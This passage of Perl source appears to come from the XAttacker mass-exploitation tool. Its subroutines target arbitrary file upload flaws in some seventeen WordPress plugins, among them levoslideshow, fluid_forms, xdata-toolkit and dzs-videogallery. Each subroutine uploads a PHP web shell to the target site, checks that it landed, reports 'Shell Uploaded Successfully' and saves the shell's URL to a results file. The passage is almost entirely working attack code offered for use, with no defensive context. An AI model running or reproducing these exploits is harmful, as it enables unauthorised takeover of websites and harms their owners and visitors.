  2374. $catproup="$site/wp-content/uploads/dreamwork/$uploadfolder/big/XAttacker.php?X=Attacker";
  2375. print color('bold red'),"[";
  2376. print color('bold green'),"+";
  2377. print color('bold red'),"] ";
  2378. print color('bold white'),"dreamwork";
  2379. print color('bold white')," ......................... ";
  2380. print color('bold white'),"";
  2381. print color('bold green'),"VULN";
  2382. print color('bold white'),"\n";
  2383. print color('bold green')," [";
  2384. print color('bold red'),"+";
  2385. print color('bold green'),"] ";
  2386. print color('bold white'),"Shell Uploaded Successfully\n";
  2387. print color('bold white'),"  [Link] => $catproup\n";
  2388. open (TEXT, '>>Result/Shells.txt');
  2389. print TEXT "$catproup\n";
  2390. close (TEXT);
  2391. }else{
  2392. mdef();
  2393. }
  2394. }
  2395. sub mdef(){
  2396. my $url = "$site/wp-admin/admin.php?page=dreamwork_manage";
  2397.  
  2398. my $response = $ua->post($url, Content_Type => 'multipart/form-data', Content => [album_img => ["tool/index.html"], task => 'drm_add_new_album', album_name => '', album_desc => '',]);
  2399.  
  2400. if ($response->content =~ /\/uploads\/dreamwork\/(.*?)\/big\/index.html/) {
  2401. $uploadfolder=$1;
  2402. $catproup="$site/wp-content/uploads/dreamwork/$uploadfolder/big/index.html";
  2403. print color('bold red'),"[";
  2404. print color('bold green'),"+";
  2405. print color('bold red'),"] ";
  2406. print color('bold white'),"dreamwork";
  2407. print color('bold white')," ......................... ";
  2408. print color('bold white'),"";
  2409. print color('bold green'),"VULN";
  2410. print color('bold white'),"\n";
  2411. print color('bold green')," [";
  2412. print color('bold red'),"+";
  2413. print color('bold green'),"] ";
  2414. print color('bold white'),"Shell Uploaded Successfully\n";
  2415. print color('bold white'),"  [Link] => $catproup\n";
  2416. open (TEXT, '>>Result/Shells.txt');
  2417. print TEXT "$catproup\n";
  2418. close (TEXT);
  2419. }else{
  2420. print color('bold red'),"[";
  2421. print color('bold green'),"+";
  2422. print color('bold red'),"] ";
  2423. print color('bold white'),"dreamwork";
  2424. print color('bold white')," ......................... ";
  2425. print color('bold red'),"Failed";
  2426. print color('bold white'),"\n";
  2427. }
  2428. }
  2429.  
  2430. ################ Contact Form 7 #####################
  2431. sub con7(){
  2432. my $url = "$site/wp-admin/admin-ajax.php";
  2433. my $field_name = "Filedata";
  2434.  
  2435. my $sexycontactres = $ua->post( $url,
  2436.             Content_Type => 'form-data',
  2437.             Content => [ "action" => "nm_webcontact_upload_file", $field_name => ["tool/XAttacker.php"] ]
  2438.            
  2439.             );
  2440.  
  2441. if ($sexycontactres->content =~ /"filename":"(.*?)"}/) {
  2442. $uploadfolder=$1;
  2443. $levoslideshowup="$site/wp-content/uploads/contact_files/$uploadfolder";
  2444. print color('bold red'),"[";
  2445. print color('bold green'),"+";
  2446. print color('bold red'),"] ";
  2447. print color('bold white'),"Contact Form Menager";
  2448. print color('bold white')," .............. ";
  2449. print color('bold green'),"VULN\n";
  2450. print color('bold green')," [";
  2451. print color('bold red'),"+";
  2452. print color('bold green'),"] ";
  2453. print color('bold white'),"Shell Uploaded Successfully\n";
  2454. print color('bold white'),"  [Link] => $levoslideshowup\n";
  2455. open (TEXT, '>>Result/Shells.txt');
  2456. print TEXT "$levoslideshowup\n";
  2457. close (TEXT);
  2458. }else{
  2459. print color('bold red'),"[";
  2460. print color('bold green'),"+";
  2461. print color('bold red'),"] ";
  2462. print color('bold white'),"Contact Form Menager";
  2463. print color('bold white')," .............. ";
  2464. print color('bold red'),"Failed\n";
  2465. }
  2466. }
  2467.  
  2468. ################ Fuild #####################
  2469. sub fuild(){
  2470. my $url = "$site/wp-content/plugins/fluid_forms/file-upload/server/php/";
  2471. my $shell ="tool/XAttacker.php";
  2472. my $field_name = "files[]";
  2473.  
  2474. my $response = $ua->post($url, Content_Type => 'multipart/form-data', content => [ $field_name => [$shell]]);
  2475. $fuildup="$site/wp-content//plugins//fluid_forms/file-upload/server/php/files/XAttacker.php?X=Attacker";
  2476.  
  2477. if ($response->content =~ /{"files/) {
  2478. print color('bold red'),"[";
  2479. print color('bold green'),"+";
  2480. print color('bold red'),"] ";
  2481. print color('bold white'),"fluid_form";
  2482. print color('bold white')," ........................ ";
  2483. print color('bold green'),"VULN";
  2484. print color('bold white'),"\n";
  2485. print color('bold green')," [";
  2486. print color('bold red'),"+";
  2487. print color('bold green'),"] ";
  2488. print color('bold white'),"Shell Uploaded Successfully\n";
  2489. print color('bold white'),"  [Link] => $fuildup\n";
  2490. open (TEXT, '>>Result/Shells.txt');
  2491. print TEXT "$fuildup\n";
  2492. close (TEXT);
  2493. }else{
  2494. print color('bold red'),"[";
  2495. print color('bold green'),"+";
  2496. print color('bold red'),"] ";
  2497. print color('bold white'),"fluid_form";
  2498. print color('bold white')," ........................ ";
  2499. print color('bold red'),"Failed";
  2500. print color('bold white'),"\n";
  2501. }
  2502. }
  2503.  
  2504. ################ levoslideshow #####################
  2505. sub levoslideshow(){
  2506.  
  2507. my $url = "$site/wp-admin/admin.php?page=levoslideshow_manage";
  2508. my $response = $ua->post($url, Content_Type => 'multipart/form-data', Content => [album_img => ["tool/XAttacker.php"], task => 'lvo_add_new_album', album_name => '', album_desc => '',]);
  2509.  
  2510. if ($response->content =~ /\/uploads\/levoslideshow\/(.*?)\/big\/XAttacker.php/) {
  2511. $uploadfolder=$1;
  2512. $levoslideshowup="$site/wp-content/uploads/levoslideshow/$uploadfolder/big/XAttacker.php?X=Attacker";
  2513. print color('bold red'),"[";
  2514. print color('bold green'),"+";
  2515. print color('bold red'),"] ";
  2516. print color('bold white'),"levoslideshow";
  2517. print color('bold white')," ..................... ";
  2518. print color('bold white'),"";
  2519. print color('bold green'),"VULN";
  2520. print color('bold white'),"\n";
  2521. print color('bold green')," [";
  2522. print color('bold red'),"+";
  2523. print color('bold green'),"] ";
  2524. print color('bold white'),"Shell Uploaded Successfully\n";
  2525. print color('bold white'),"  [Link] => $levoslideshowup\n";
  2526. open (TEXT, '>>Result/Shells.txt');
  2527. print TEXT "$levoslideshowup\n";
  2528. close (TEXT);
  2529. }else{
  2530. print color('bold red'),"[";
  2531. print color('bold green'),"+";
  2532. print color('bold red'),"] ";
  2533. print color('bold white'),"levoslideshow";
  2534. print color('bold white')," ..................... ";
  2535. print color('bold red'),"Failed";
  2536. print color('bold white'),"\n";
  2537. }
  2538. }
  2539. ################ VERTÄ°CAL #####################
  2540. sub vertical(){
  2541.  
  2542. my $url = "$site/wp-admin/admin.php?page=vertical_manage";
  2543. my $response = $ua->post($url, Content_Type => 'multipart/form-data', Content => [album_img => ["tool/XAttacker.php"], task => 'vrt_add_new_album', album_name => '', album_desc => '',]);
  2544.  
  2545. if ($response->content =~ /\/uploads\/vertical\/(.*?)\/big\/XAttacker.php/) {
  2546. $uploadfolder=$1;
  2547. $levoslideshowup="$site/wp-content/uploads/vertical/$uploadfolder/big/XAttacker.php?X=Attacker";
  2548. print color('bold red'),"[";
  2549. print color('bold green'),"+";
  2550. print color('bold red'),"] ";
  2551. print color('bold white'),"vertical";
  2552. print color('bold white')," .......................... ";
  2553. print color('bold white'),"";
  2554. print color('bold green'),"VULN";
  2555. print color('bold white'),"\n";
  2556. print color('bold green')," [";
  2557. print color('bold red'),"+";
  2558. print color('bold green'),"] ";
  2559. print color('bold white'),"Shell Uploaded Successfully\n";
  2560. print color('bold white'),"  [Link] => $levoslideshowup\n";
  2561. open (TEXT, '>>Result/Shells.txt');
  2562. print TEXT "$levoslideshowup\n";
  2563. close (TEXT);
  2564. }else{
  2565. print color('bold red'),"[";
  2566. print color('bold green'),"+";
  2567. print color('bold red'),"] ";
  2568. print color('bold white'),"vertical";
  2569. print color('bold white')," .......................... ";
  2570. print color('bold red'),"Failed";
  2571. print color('bold white'),"\n";
  2572. }
  2573. }
  2574.  
  2575. ################ carousel_manage #####################
  2576. sub carousel(){
  2577.  
  2578. my $url = "$site/wp-admin/admin.php?page=carousel_manage";
  2579. my $response = $ua->post($url, Content_Type => 'multipart/form-data', Content => [album_img => ["tool/XAttacker.php"], task => 'carousel_add_new_album', album_name => '', album_desc => '',]);
  2580.  
  2581. if ($response->content =~ /\/uploads\/carousel\/(.*?)\/big\/XAttacker.php/) {
  2582. $uploadfolder=$1;
  2583. $levoslideshowup="$site/wp-content/uploads/carousel/$uploadfolder/big/XAttacker.php?X=Attacker";
  2584. print color('bold red'),"[";
  2585. print color('bold green'),"+";
  2586. print color('bold red'),"] ";
  2587. print color('bold white'),"carousel";
  2588. print color('bold white')," .......................... ";
  2589. print color('bold white'),"";
  2590. print color('bold green'),"VULN";
  2591. print color('bold white'),"\n";
  2592. print color('bold green')," [";
  2593. print color('bold red'),"+";
  2594. print color('bold green'),"] ";
  2595. print color('bold white'),"Shell Uploaded Successfully\n";
  2596. print color('bold white'),"  [Link] => $levoslideshowup\n";
  2597. open (TEXT, '>>Result/Shells.txt');
  2598. print TEXT "$levoslideshowup\n";
  2599. close (TEXT);
  2600. }else{
  2601. print color('bold red'),"[";
  2602. print color('bold green'),"+";
  2603. print color('bold red'),"] ";
  2604. print color('bold white'),"carousel";
  2605. print color('bold white')," .......................... ";
  2606. print color('bold red'),"Failed";
  2607. print color('bold white'),"\n";
  2608. }
  2609. }
  2610.  
  2611. ################ superb_manage #####################
  2612. sub superb(){
  2613.  
  2614. my $url = "$site/wp-admin/admin.php?page=superb_manage";
  2615. my $response = $ua->post($url, Content_Type => 'multipart/form-data', Content => [album_img => ["tool/XAttacker.php"], task => 'superb_add_new_album', album_name => '', album_desc => '',]);
  2616.  
  2617. if ($response->content =~ /\/uploads\/superb\/(.*?)\/big\/XAttacker.php/) {
  2618. $uploadfolder=$1;
  2619. $levoslideshowup="$site/wp-content/uploads/superb/$uploadfolder/big/XAttacker.php?X=Attacker";
  2620. print color('bold red'),"[";
  2621. print color('bold green'),"+";
  2622. print color('bold red'),"] ";
  2623. print color('bold white'),"superb";
  2624. print color('bold white')," ............................ ";
  2625. print color('bold white'),"";
  2626. print color('bold green'),"VULN";
  2627. print color('bold white'),"\n";
  2628. print color('bold green')," [";
  2629. print color('bold red'),"+";
  2630. print color('bold green'),"] ";
  2631. print color('bold white'),"Shell Uploaded Successfully\n";
  2632. print color('bold white'),"  [Link] => $levoslideshowup\n";
  2633. open (TEXT, '>>Result/Shells.txt');
  2634. print TEXT "$levoslideshowup\n";
  2635. close (TEXT);
  2636. }else{
  2637. print color('bold red'),"[";
  2638. print color('bold green'),"+";
  2639. print color('bold red'),"] ";
  2640. print color('bold white'),"superb";
  2641. print color('bold white')," ............................ ";
  2642. print color('bold red'),"Failed";
  2643. print color('bold white'),"\n";
  2644. }
  2645. }
  2646.  
  2647. ################ yass_manage #####################
  2648. sub yass(){
  2649.  
  2650. my $url = "$site/wp-admin/admin.php?page=yass_manage";
  2651. my $response = $ua->post($url, Content_Type => 'multipart/form-data', Content => [album_img => ["tool/XAttacker.php"], task => 'yass_add_new_album', album_name => '', album_desc => '',]);
  2652.  
  2653. if ($response->content =~ /\/uploads\/yass\/(.*?)\/big\/XAttacker.php/) {
  2654. $uploadfolder=$1;
  2655. $levoslideshowup="$site/wp-content/uploads/yass/$uploadfolder/big/XAttacker.php?X=Attacker";
  2656. print color('bold red'),"[";
  2657. print color('bold green'),"+";
  2658. print color('bold red'),"] ";
  2659. print color('bold white'),"yass";
  2660. print color('bold white')," .............................. ";
  2661. print color('bold white'),"";
  2662. print color('bold green'),"VULN";
  2663. print color('bold white'),"\n";
  2664. print color('bold green')," [";
  2665. print color('bold red'),"+";
  2666. print color('bold green'),"] ";
  2667. print color('bold white'),"Shell Uploaded Successfully\n";
  2668. print color('bold white'),"  [Link] => $levoslideshowup\n";
  2669. open (TEXT, '>>Result/Shells.txt');
  2670. print TEXT "$levoslideshowup\n";
  2671. close (TEXT);
  2672. }else{
  2673. print color('bold red'),"[";
  2674. print color('bold green'),"+";
  2675. print color('bold red'),"] ";
  2676. print color('bold white'),"yass";
  2677. print color('bold white')," .............................. ";
  2678. print color('bold red'),"Failed";
  2679. print color('bold white'),"\n";
  2680. }
  2681. }
  2682.  
  2683. ################ homepageslideshow #####################
  2684. sub homepage(){
  2685.  
  2686. my $url = "$site/wp-admin/admin.php?page=homepageslideshow_manage";
  2687. my $response = $ua->post($url, Content_Type => 'multipart/form-data', Content => [album_img => ["tool/XAttacker.php"], task => 'hss_add_new_album', album_name => '', album_desc => '',]);
  2688.  
  2689. if ($response->content =~ /\/uploads\/homepageslideshow\/(.*?)\/big\/XAttacker.php/) {
  2690. $uploadfolder=$1;
  2691. $levoslideshowup="$site/wp-content/uploads/homepageslideshow/$uploadfolder/big/XAttacker.php?X=Attacker";
  2692. print color('bold red'),"[";
  2693. print color('bold green'),"+";
  2694. print color('bold red'),"] ";
  2695. print color('bold white'),"homepageslideshow";
  2696. print color('bold white')," ................. ";
  2697. print color('bold white'),"";
  2698. print color('bold green'),"VULN";
  2699. print color('bold white'),"\n";
  2700. print color('bold green')," [";
  2701. print color('bold red'),"+";
  2702. print color('bold green'),"] ";
  2703. print color('bold white'),"Shell Uploaded Successfully\n";
  2704. print color('bold white'),"  [Link] => $levoslideshowup\n";
  2705. open (TEXT, '>>Result/Shells.txt');
  2706. print TEXT "$levoslideshowup\n";
  2707. close (TEXT);
  2708. }else{
  2709. print color('bold red'),"[";
  2710. print color('bold green'),"+";
  2711. print color('bold red'),"] ";
  2712. print color('bold white'),"homepageslideshow";
  2713. print color('bold white')," ................. ";
  2714. print color('bold red'),"Failed";
  2715. print color('bold white'),"\n";
  2716. }
  2717. }
  2718.  
  2719. ################ image-news-slider #####################
  2720. sub ipage(){
  2721.  
  2722. my $url = "$site/wp-admin/admin.php?page=image-news-slider_manage";
  2723. my $response = $ua->post($url, Content_Type => 'multipart/form-data', Content => [album_img => ["tool/XAttacker.php"], task => 'slider_add_new_album', album_name => '', album_desc => '',]);
  2724.  
  2725. if ($response->content =~ /\/uploads\/image-news-slider\/(.*?)\/big\/XAttacker.php/) {
  2726. $uploadfolder=$1;
  2727. $levoslideshowup="$site/wp-content/uploads/image-news-slider/$uploadfolder/big/XAttacker.php?X=Attacker";
  2728. print color('bold red'),"[";
  2729. print color('bold green'),"+";
  2730. print color('bold red'),"] ";
  2731. print color('bold white'),"image-news-slider";
  2732. print color('bold white')," ................. ";
  2733. print color('bold white'),"";
  2734. print color('bold green'),"VULN";
  2735. print color('bold white'),"\n";
  2736. print color('bold green')," [";
  2737. print color('bold red'),"+";
  2738. print color('bold green'),"] ";
  2739. print color('bold white'),"Shell Uploaded Successfully\n";
  2740. print color('bold white'),"  [Link] => $levoslideshowup\n";
  2741. open (TEXT, '>>Result/Shells.txt');
  2742. print TEXT "$levoslideshowup\n";
  2743. close (TEXT);
  2744. }else{
  2745. print color('bold red'),"[";
  2746. print color('bold green'),"+";
  2747. print color('bold red'),"] ";
  2748. print color('bold white'),"image-news-slider";
  2749. print color('bold white')," ................. ";
  2750. print color('bold red'),"Failed";
  2751. print color('bold white'),"\n";
  2752. }
  2753. }
  2754.  
  2755. ################ Bliss-slider #####################
  2756. sub bliss(){
  2757.  
  2758. my $url = "$site/wp-admin/admin.php?page=unique_manage";
  2759. my $response = $ua->post($url, Content_Type => 'multipart/form-data', Content => [album_img => ["tool/XAttacker.php"], task => 'uni_add_new_album', album_name => '', album_desc => '',]);
  2760.  
  2761. if ($response->content =~ /\/uploads\/unique\/(.*?)\/big\/XAttacker.php/) {
  2762. $uploadfolder=$1;
  2763. $levoslideshowup="$site/wp-content/uploads/unique/$uploadfolder/big/XAttacker.php?X=Attacker";
  2764. print color('bold red'),"[";
  2765. print color('bold green'),"+";
  2766. print color('bold red'),"] ";
  2767. print color('bold white'),"bliss-news-slider";
  2768. print color('bold white')," ................. ";
  2769. print color('bold white'),"";
  2770. print color('bold green'),"VULN";
  2771. print color('bold white'),"\n";
  2772. print color('bold green')," [";
  2773. print color('bold red'),"+";
  2774. print color('bold green'),"] ";
  2775. print color('bold white'),"Shell Uploaded Successfully\n";
  2776. print color('bold white'),"  [Link] => $levoslideshowup\n";
  2777. open (TEXT, '>>Result/Shells.txt');
  2778. print TEXT "$levoslideshowup\n";
  2779. close (TEXT);
  2780. }else{
  2781. print color('bold red'),"[";
  2782. print color('bold green'),"+";
  2783. print color('bold red'),"] ";
  2784. print color('bold white'),"bliss-news-slider";
  2785. print color('bold white')," ................. ";
  2786. print color('bold red'),"Failed";
  2787. print color('bold white'),"\n";
  2788. }
  2789. }
  2790.  
  2791. ################ xdata-toolkit #####################
  2792. sub xdata(){
  2793.  
  2794. my $url = "$site/wp-content/plugins/xdata-toolkit/modules/TransformStudio/SaveTransformUpdateView.php";
  2795. my $response = $ua->post($url, Content_Type => 'multipart/form-data', Content => ["xsldata" => '<? xml version = "1.0"?><xsl: stylesheet version = "1.0" xmlns: xsl = "http://www.w3.org/1999/XSL/Transform"><xsl:template match ="/"><html></html></xsl:template></xsl:stylesheet>',e_transform_file => ["tool/XAttacker.php"],]);
  2796.  
  2797. $cherryup="$site/wp-content/plugins/xdata-toolkit/transforms/client/XAttacker.php?X=Attacker";
  2798.  
  2799. my $checkcherry = $ua->get("$cherryup")->content;
  2800. if($checkcherry =~/X Attacker/) {
  2801. print color('bold red'),"[";
  2802. print color('bold green'),"+";
  2803. print color('bold red'),"] ";
  2804. print color('bold white'),"xdata-toolkit";
  2805. print color('bold white')," ..................... ";
  2806. print color('bold white'),"";
  2807. print color('bold green'),"VULN";
  2808. print color('bold white'),"\n";
  2809. print color('bold green')," [";
  2810. print color('bold red'),"+";
  2811. print color('bold green'),"] ";
  2812. print color('bold white'),"Shell Uploaded Successfully\n";
  2813. print color('bold white'),"  [Link] => $cherryup\n";
  2814. open (TEXT, '>>Result/Shells.txt');
  2815. print TEXT "$cherryup\n";
  2816. close (TEXT);
  2817. }else{
  2818. print color('bold red'),"[";
  2819. print color('bold green'),"+";
  2820. print color('bold red'),"] ";
  2821. print color('bold white'),"xdata-toolkit";
  2822. print color('bold white')," ..................... ";
  2823. print color('bold red'),"Failed";
  2824. print color('bold white'),"\n";
  2825. }
  2826. }
  2827.  
  2828. ################ Power Zoomer #####################
  2829. sub powerzoomer(){
  2830. my $url = "$site/wp-admin/admin.php?page=powerzoomer_manage";
  2831.  
  2832. my $response = $ua->post($url, Content_Type => 'multipart/form-data', Content => [album_img => ["tool/XAttacker.php"], task => 'pwz_add_new_album', album_name => '', album_desc => '',]);
  2833.  
  2834. if ($response->content =~ /\/uploads\/powerzoomer\/(.*?)\/big\/XAttacker.php/) {
  2835. $uploadfolder=$1;
  2836. $zoomerup="$site/wp-content/uploads/powerzoomer/$uploadfolder/big/XAttacker.php?X=Attacker";
  2837. print color('bold red'),"[";
  2838. print color('bold green'),"+";
  2839. print color('bold red'),"] ";
  2840. print color('bold white'),"Power Zoomer";
  2841. print color('bold white')," ...................... ";
  2842. print color('bold green'),"VULN";
  2843. print color('bold white'),"\n";
  2844. print color('bold green')," [";
  2845. print color('bold red'),"+";
  2846. print color('bold green'),"] ";
  2847. print color('bold white'),"Shell Uploaded Successfully\n";
  2848. print color('bold white'),"  [Link] => $zoomerup\n";
  2849. open (TEXT, '>>Result/Shells.txt');
  2850. print TEXT "$zoomerup\n";
  2851. close (TEXT);
  2852. }else{
  2853. print color('bold red'),"[";
  2854. print color('bold green'),"+";
  2855. print color('bold red'),"] ";
  2856. print color('bold white'),"Power Zoomer";
  2857. print color('bold white')," ...................... ";
  2858. print color('bold red'),"Failed";
  2859. print color('bold white'),"\n";
  2860. }
  2861. }
  2862.  
  2863. ################ foxcontact #####################
  2864. sub wofind(){
  2865.  
  2866.  
  2867. $foxup="$site/wp-content/plugins/woocommerce-products-filter/languages/woocommerce-products-filter-en_US.po";
  2868.  
  2869. my $checkfoxup = $ua->get("$foxup")->content;
  2870. if ($checkfoxup =~ /plugin_options.php/) {
  2871. print color('bold red'),"[";
  2872. print color('bold green'),"+";
  2873. print color('bold red'),"] ";
  2874. print color('bold white'),"products-filter";
  2875. print color('bold white')," ................... ";
  2876. print color('bold green'),"FOUND\n";
  2877. open (TEXT, '>>Result/woocommerce-products-filter.txt');
  2878. print TEXT "$foxup\n";
  2879. close (TEXT);
  2880. }else{
  2881. print color('bold red'),"[";
  2882. print color('bold green'),"+";
  2883. print color('bold red'),"] ";
  2884. print color('bold white'),"products-filter";
  2885. print color('bold white')," ................... ";
  2886. print color('bold red'),"Failed\n";
  2887. }
  2888. }
  2889.  
  2890. ################ m-forms-community #####################
  2891. sub mms(){
  2892. my $url = "$site/wp-content/plugins/mm-forms-community/includes/doajaxfileupload.php";
  2893.  
  2894. my $response = $ua->post($url, Content_Type => 'multipart/form-data',Content => [ 'fileToUpload' => ["tool/xAttacker.php"] ]);
  2895.  
  2896. if ($response->content =~ /filename: '(.*?)'/) {
  2897. $uploadfolder=$1;
  2898. $zoomerup="$site/wp-content/plugins/mm-forms-community/upload/temp/$uploadfolder";
  2899. print color('bold red'),"[";
  2900. print color('bold green'),"+";
  2901. print color('bold red'),"] ";
  2902. print color('bold white'),"mm-forms com";
  2903. print color('bold white')," ...................... ";
  2904. print color('bold green'),"VULN";
  2905. print color('bold white'),"\n";
  2906. print color('bold green')," [";
  2907. print color('bold red'),"+";
  2908. print color('bold green'),"] ";
  2909. print color('bold white'),"Shell Uploaded Successfully\n";
  2910. print color('bold white'),"  [Link] => $zoomerup\n";
  2911. open (TEXT, '>>Result/Shells.txt');
  2912. print TEXT "$zoomerup\n";
  2913. close (TEXT);
  2914. }else{
  2915. mmsdef();
  2916. }
  2917. }
  2918. sub mmsdef(){
  2919. my $url = "$site/wp-content/plugins/mm-forms-community/includes/doajaxfileupload.php";
  2920.  
  2921. my $response = $ua->post($url, Content_Type => 'multipart/form-data',Content => [ 'fileToUpload' => ["tool/izo.html"] ]);
  2922.  
  2923. if ($response->content =~ /filename: '(.*?)'/) {
  2924. $uploadfolder=$1;
  2925. $zoomerup="$site/wp-content/plugins/mm-forms-community/upload/temp/$uploadfolder";
  2926. print color('bold red'),"[";
  2927. print color('bold green'),"+";
  2928. print color('bold red'),"] ";
  2929. print color('bold white'),"mm-forms com";
  2930. print color('bold white')," ...................... ";
  2931. print color('bold green'),"VULN";
  2932. print color('bold white'),"\n";
  2933. print color('bold green')," [";
  2934. print color('bold red'),"+";
  2935. print color('bold green'),"] ";
  2936. print color('bold white'),"Shell Uploaded Successfully\n";
  2937. print color('bold white'),"  [Link] => $zoomerup\n";
  2938. open (TEXT, '>>Result/Shells.txt');
  2939. print TEXT "$zoomerup\n";
  2940. close (TEXT);
  2941. }else{
  2942. print color('bold red'),"[";
  2943. print color('bold green'),"+";
  2944. print color('bold red'),"] ";
  2945. print color('bold white'),"mm-forms com";
  2946. print color('bold white')," ...................... ";
  2947. print color('bold red'),"Failed";
  2948. print color('bold white'),"\n";
  2949. }
  2950. }
  2951. sub xxsav(){
  2952. my $url = "$site/wp-content/plugins/developer-tools/libs/swfupload/upload.php";
  2953.  
  2954. my $response = $ua->post($url, Content_Type => 'multipart/form-data',Content => [ 'UPLOADDIR'=>'../', 'ADMINEMAIL'=>'test@example.com', 'Filedata' => ["tool/XAttcker.php"]]);
  2955.  
  2956. $zoomerup="$site//wp-content/plugins/developer-tools/libs/XAttcker.php?X=Attacker";
  2957.  
  2958. my $checkk = $ua->get("$zoomerup")->content;
  2959. if($checkk =~/X Attacker/) {
  2960. print color('bold red'),"[";
  2961. print color('bold green'),"+";
  2962. print color('bold red'),"] ";
  2963. print color('bold white'),"developer-tools";
  2964. print color('bold white')," ................... ";
  2965. print color('bold green'),"VULN";
  2966. print color('bold white'),"\n";
  2967. print color('bold green')," [";
  2968. print color('bold red'),"+";
  2969. print color('bold green'),"] ";
  2970. print color('bold white'),"Shell Uploaded Successfully\n";
  2971. print color('bold white'),"  [Link] => $zoomerup\n";
  2972. open (TEXT, '>>Result/Shells.txt');
  2973. print TEXT "$zoomerup\n";
  2974. close (TEXT);
  2975. }else{
  2976. print color('bold red'),"[";
  2977. print color('bold green'),"+";
  2978. print color('bold red'),"] ";
  2979. print color('bold white'),"developer-tools";
  2980. print color('bold white')," ................... ";
  2981. print color('bold red'),"Failed";
  2982. print color('bold white'),"\n";
  2983. }
  2984. }
  2985.  
  2986. sub xxsd(){
  2987. my $url = "$site/wp-content/plugins/genesis-simple-defaults/uploadFavicon.php";
  2988.  
  2989. my $response = $ua->post($url, Content_Type => 'multipart/form-data',Content => [ 'upload-favicon'=>'fake', 'iconImage' => ["tool/XAttcker.php"]]);
  2990.  
  2991. $zoomerup="$site//wp-content/uploads/favicon/XAttcker.php?X=Attacker";
  2992.  
  2993. my $checkk = $ua->get("$zoomerup")->content;
  2994. if($checkk =~/X Attacker/) {
  2995. print color('bold red'),"[";
  2996. print color('bold green'),"+";
  2997. print color('bold red'),"] ";
  2998. print color('bold white'),"genesis-simple";
  2999. print color('bold white')," .................... ";
  3000. print color('bold green'),"VULN";
  3001. print color('bold white'),"\n";
  3002. print color('bold green')," [";
  3003. print color('bold red'),"+";
  3004. print color('bold green'),"] ";
  3005. print color('bold white'),"Shell Uploaded Successfully\n";
  3006. print color('bold white'),"  [Link] => $zoomerup\n";
  3007. open (TEXT, '>>Result/Shells.txt');
  3008. print TEXT "$zoomerup\n";
  3009. close (TEXT);
  3010. }else{
  3011. print color('bold red'),"[";
  3012. print color('bold green'),"+";
  3013. print color('bold red'),"] ";
  3014. print color('bold white'),"genesis-simple";
  3015. print color('bold white')," .................... ";
  3016. print color('bold red'),"Failed";
  3017. print color('bold white'),"\n";
  3018. }
  3019. }
  3020.  
  3021. sub at1(){
  3022. my $url = "$site/wp-content/plugins/dzs-portfolio/upload.php";
  3023.  
  3024. my $response = $ua->post($url, Content_Type => 'multipart/form-data',Content => [ 'file_field' => ["tool/XAttcker.PhP.txtx"] ]);
  3025.  
  3026. $zoomerup="$site/wp-content/plugins/dzs-portfolio/upload/XAttcker.PhP.txtx?X=Attacker";
  3027.  
  3028. my $checkk = $ua->get("$zoomerup")->content;
  3029. if($checkk =~/X Attacker/) {
  3030. print color('bold red'),"[";
  3031. print color('bold green'),"+";
  3032. print color('bold red'),"] ";
  3033. print color('bold white'),"dzs-portfolio";
  3034. print color('bold white')," ..................... ";
  3035. print color('bold green'),"VULN";
  3036. print color('bold white'),"\n";
  3037. print color('bold green')," [";
  3038. print color('bold red'),"+";
  3039. print color('bold green'),"] ";
  3040. print color('bold white'),"Shell Uploaded Successfully\n";
  3041. print color('bold white'),"  [Link] => $zoomerup\n";
  3042. open (TEXT, '>>Result/Shells.txt');
  3043. print TEXT "$zoomerup\n";
  3044. close (TEXT);
  3045. }else{
  3046. att1();
  3047. }
  3048. }
  3049. sub att1(){
  3050. my $url = "$site/wp-content/plugins/dzs-portfolio/admin/upload.php";
  3051.  
  3052. my $response = $ua->post($url, Content_Type => 'multipart/form-data',Content => [ 'file_field' => ["tool/XAttcker.PhP.txtx"] ]);
  3053.  
  3054. $zoomerup="$site/wp-content/plugins/dzs-portfolio/upload/admin/XAttcker.PhP.txtx?X=Attacker";
  3055.  
  3056. my $checkk = $ua->get("$zoomerup")->content;
  3057. if($checkk =~/X Attacker/) {
  3058. print color('bold red'),"[";
  3059. print color('bold green'),"+";
  3060. print color('bold red'),"] ";
  3061. print color('bold white'),"dzs-portfolio";
  3062. print color('bold white')," ..................... ";
  3063. print color('bold green'),"VULN";
  3064. print color('bold white'),"\n";
  3065. print color('bold green')," [";
  3066. print color('bold red'),"+";
  3067. print color('bold green'),"] ";
  3068. print color('bold white'),"Shell Uploaded Successfully\n";
  3069. print color('bold white'),"  [Link] => $zoomerup\n";
  3070. open (TEXT, '>>Result/Shells.txt');
  3071. print TEXT "$zoomerup\n";
  3072. close (TEXT);
  3073. }else{
  3074. print color('bold red'),"[";
  3075. print color('bold green'),"+";
  3076. print color('bold red'),"] ";
  3077. print color('bold white'),"dzs-portfolio";
  3078. print color('bold white')," ..................... ";
  3079. print color('bold red'),"Failed";
  3080. print color('bold white'),"\n";
  3081. }
  3082. }
  3083.  
  3084. sub at2(){
  3085. my $url = "$site/wp-content/plugins/dzs-videogallery/upload.php";
  3086.  
  3087. my $response = $ua->post($url, Content_Type => 'multipart/form-data',Content => [ 'file_field' => ["tool/XAttcker.PhP.txtx"] ]);
  3088.  
  3089. $zoomerup="$site/wp-content/plugins/dzs-videogallery/upload/XAttcker.PhP.txtx?X=Attacker";
  3090.  
  3091. my $checkk = $ua->get("$zoomerup")->content;
  3092. if($checkk =~/X Attacker/) {
  3093. print color('bold red'),"[";
  3094. print color('bold green'),"+";
  3095. print color('bold red'),"] ";
  3096. print color('bold white'),"dzs-videogallery";
  3097. print color('bold white')," .................. ";
  3098. print color('bold green'),"VULN";
  3099. print color('bold white'),"\n";
  3100. print color('bold green')," [";
  3101. print color('bold red'),"+";
  3102. print color('bold green'),"] ";
  3103. print color('bold white'),"Shell Uploaded Successfully\n";
  3104. print color('bold white'),"  [Link] => $zoomerup\n";
  3105. open (TEXT, '>>Result/Shells.txt');
  3106. print TEXT "$zoomerup\n";
  3107. close (TEXT);
  3108. }else{
  3109. at3();
  3110. }
  3111. }
  3112. sub at3(){
  3113. my $url = "$site/wp-content/plugins/dzs-videogallery/admin/upload.php";
  3114.  
  3115. my $response = $ua->post($url, Content_Type => 'multipart/form-data',Content => [ 'file_field' => ["tool/XAttcker.PhP.txtx"] ]);
  3116.  
  3117. $zoomerup="$site/wp-content/plugins/dzs-videogallery/admin/upload/XAttcker.PhP.txtx?X=Attacker";
  3118.  
  3119. my $checkk = $ua->get("$zoomerup")->content;
  3120. if($checkk =~/X Attacker/) {
  3121. print color('bold red'),"[";
  3122. print color('bold green'),"+";
  3123. print color('bold red'),"] ";
  3124. print color('bold white'),"dzs-videogallery";
  3125. print color('bold white')," .................. ";
